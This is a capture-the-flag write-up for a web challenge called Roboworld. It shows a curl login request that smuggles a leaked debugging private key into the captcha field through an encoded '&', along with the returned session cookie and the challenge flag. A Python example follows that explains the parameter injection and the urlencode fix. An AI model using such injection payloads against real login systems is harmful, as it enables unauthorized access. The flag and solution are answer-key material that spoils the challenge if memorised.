Roboworld
web
A friend of mine told me about this website where I can find secret cool stuff. He even managed to leak a part of the source code for me, but when I try to login it always fails :(
Can you figure out what’s wrong and access the secret files?
Solution
When looking into the leaked source code, you can find a debugging privkey. When you test some requests to the /captchaVerify endpoint with that key, it seems to make the captchaUserValue check accept any value. So let's try to inject that private key into the captcha_verification_value field:
$ curl 'http://challs.xmas.htsp.ro:11000/login' --data 'user=backd00r&pass=catsrcool&captcha_verification_value=AAAA%26privateKey=8EE86735658A9CE426EAF4E26BB0450E' -vvv
Yeah, it works! The important parts of the response are a session cookie and the redirect to the dashboard page:
Set-Cookie: session=eyJsb2dnZWQiOnRydWV9.XffUxA.M-sXpowWOM2fqtA9vYzHff-wl-Y;
<p>You should be redirected automatically to target URL: <a href="/dashboard_jidcc88574c">/dashboard_jidcc88574c</a>. If not click the link.
When we set the cookie and visit the page, there are three links; the last one is a video that shows the flag at the bottom.
flag: X-MAS{Am_1_Th3_R0bot?_0.o}
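Why the %26 in the login request works, and how the server side should have built its request, as an added example that is not the challenge's leaked source. It assumes the login handler pastes the decoded captcha_verification_value into the query string it sends to /captchaVerify; the function names are hypothetical, and the parameter names and form body are the ones shown above.

```python
from urllib.parse import parse_qs, urlencode

# Form body from the curl command in the write-up.
LOGIN_BODY = ("user=backd00r&pass=catsrcool&captcha_verification_value="
              "AAAA%26privateKey=8EE86735658A9CE426EAF4E26BB0450E")


def form_field(body, name):
    """Decode an urlencoded form body and return one field, as a web framework does."""
    return parse_qs(body, keep_blank_values=True)[name][0]


def backend_query_concat(captcha_value):
    """Assumed vulnerable pattern: decoded user input pasted into the query string."""
    return "captchaUserValue=" + captcha_value


def backend_query_encoded(captcha_value):
    """Hardened: urlencode() escapes '&' and '=', so the input stays one parameter."""
    return urlencode({"captchaUserValue": captcha_value})


def params_seen_by_backend(query):
    """Parameters a /captchaVerify handler would parse out of that query string."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


if __name__ == "__main__":
    # %26 is decoded to a literal '&' before the handler ever sees the field.
    value = form_field(LOGIN_BODY, "captcha_verification_value")
    for build in (backend_query_concat, backend_query_encoded):
        query = build(value)
        print(build.__name__, "->", query)
        print("  backend parameters:", sorted(params_seen_by_backend(query)))
```

With concatenation the backend receives a second parameter, privateKey, that the client was never meant to control; with encoding it receives a single captchaUserValue that simply fails verification. Removing the debugging key from the deployed verification code closes the bypass regardless of how the request is built.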